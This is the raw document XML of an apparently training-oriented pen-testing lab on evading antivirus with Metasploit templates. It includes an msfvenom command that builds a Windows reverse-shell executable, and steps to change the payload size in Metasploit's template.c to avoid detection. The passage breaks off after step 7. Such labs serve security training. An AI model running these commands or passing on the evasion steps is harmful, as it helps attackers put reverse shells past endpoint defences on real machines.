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D33253" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="00CB1469">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6840"/>
        </w:tabs>
        <w:spacing w:before="240" w:after="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc136525144"/>
      <w:bookmarkStart w:id="1" w:name="_Toc145189189"/>
      <w:bookmarkStart w:id="2" w:name="_Toc228545480"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Lab 9-01: Bypass Antivirus using Metasploit Templates</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="183E793D" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="00CB1469">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:pos="9010"/>
        </w:tabs>
        <w:spacing w:before="120"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc136525145"/>
      <w:bookmarkStart w:id="4" w:name="_Toc145189190"/>
      <w:bookmarkStart w:id="5" w:name="_Toc228545481"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2FBDDFE5" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="00CB1469">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>A government institution experienced a cyber-attack on several PCs. Their system administrator is unaware of the cause of the Windows firewall failure and how hackers managed to bypass the firewall’s rules. System administrators play a crucial role in creating security defenses within an organization. Though such defenses protect the machines in the network from outside hackers, there might still be an insider who would apply different evasion techniques to identify the services running on the target. Hence, the company wants to identify the vulnerabilities exploited by the hackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224319A7" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="00CB1469">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="960"/>
          <w:tab w:val="right" w:pos="9010"/>
        </w:tabs>
        <w:spacing w:before="120"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc136525146"/>
      <w:bookmarkStart w:id="7" w:name="_Toc145189191"/>
      <w:bookmarkStart w:id="8" w:name="_Toc228545482"/>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:u w:val="single"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="033BDDC2" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="00CB1469">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">The government institution hires you as a Certified Penetration Tester because they want you to ethically hack their system and find the vulnerabilities in their PCs.   Consider an admin who has installed an antivirus to block your system from reaching malicious files. In this lab, we bypass an antivirus using Metasploit templates to check vulnerabilities in the antivirus. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB716E5" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="00CB1469">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F00D26">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Antivirus software detects malicious processes or files and prevents their execution on endpoints. Various techniques can be used to bypass antivirus and execute the malicious process in the target machine.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9017"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CB1469" w:rsidRPr="00F00D26" w14:paraId="7C8EEDF7" w14:textId="77777777" w:rsidTr="009A3A3B">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4CF62A9B" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. Open the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>MATE</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> terminal on the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ParrotOS</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">. Execute the command </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p windows/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>shell_reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> lh0st</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>=[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Target IP Address] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>lport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>=444 -f exe &gt; /home/attacker/Windows.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to generate the payload.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1ACD5DDE"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124C0F26" wp14:editId="0AEDE65F">
                  <wp:extent cx="4703161" cy="944652"/>
                  <wp:effectExtent l="19050" t="19050" r="21590" b="27305"/>
                  <wp:docPr id="1739381981" name="Picture 173938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1.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId5">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4760072" cy="956083"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5396D428" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Open the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Firefox</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> browser, type </w:t>
            </w:r>
            <w:hyperlink r:id="rId6" w:history="1">
              <w:r w:rsidRPr="00F00D26">
                <w:rPr>
                  <w:b/>
                  <w:sz w:val="18"/>
                  <w:szCs w:val="18"/>
                </w:rPr>
                <w:t>https://www.virustotal.com</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> in the address bar, and press Enter on your keyboard. On the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> website, click the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Choose file</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> option. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C55D972"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63AB7B83" wp14:editId="44AE48DA">
                  <wp:extent cx="4563027" cy="2558415"/>
                  <wp:effectExtent l="19050" t="19050" r="28575" b="13335"/>
                  <wp:docPr id="1739381982" name="Picture 173938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2.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId7">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4571701" cy="2563278"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="6483DF3A" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. In the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>File Upload</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> window, navigate to the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/home/attacker</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> directory, select the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Windows.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> file, and click </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="321794BB" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D2D9B20" wp14:editId="09A502DB">
                  <wp:extent cx="3914775" cy="2843649"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="13970"/>
                  <wp:docPr id="1739381983" name="Picture 173938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3.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId8">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3918945" cy="2846678"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB1898C" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4. Once the file is uploaded, click on the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Confirm upload</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> button to start the analysis.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EF6A1DE"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1A6B3226" wp14:editId="1D6FA430">
                  <wp:extent cx="4729480" cy="2419816"/>
                  <wp:effectExtent l="19050" t="19050" r="13970" b="19050"/>
                  <wp:docPr id="410452832" name="Picture 41045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4.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId9">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4738683" cy="2424525"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AC8B9A" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5. After completing the analysis, the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> website shows the number of antiviruses that have detected the virus. The screenshot below shows that 55 of 68 antivirus vendors have detected malicious files. The result might differ when you perform this task.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6474777F" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EFA8ABF" wp14:editId="4CA99BE6">
                  <wp:extent cx="4648835" cy="2210679"/>
                  <wp:effectExtent l="19050" t="19050" r="18415" b="18415"/>
                  <wp:docPr id="410452833" name="Picture 41045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5.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId10">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4692711" cy="2231543"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="63193A32" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6. Execute the command </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>pluma</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> /usr/share/metasploit-framework/data/templates/src/pe/exe/template.c</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59DA820E"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21CEB095" wp14:editId="1158F86F">
                  <wp:extent cx="4707444" cy="367644"/>
                  <wp:effectExtent l="19050" t="19050" r="17145" b="13970"/>
                  <wp:docPr id="410452834" name="Picture 41045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6.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId11">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4789657" cy="374065"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EBC3086" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7. A </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>template.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> file </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>opens;,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> change the payload size from </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>4096</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4000 </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>in file</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>, save the file, and close the editor.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="049E4B91"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1D3F658F" wp14:editId="2427F15F">
                  <wp:extent cx="3343275" cy="2712481"/>
                  <wp:effectExtent l="19050" t="19050" r="9525" b="12065"/>
                  <wp:docPr id="410452835" name="Picture 41045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7.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId12">
                            <a:extLst>
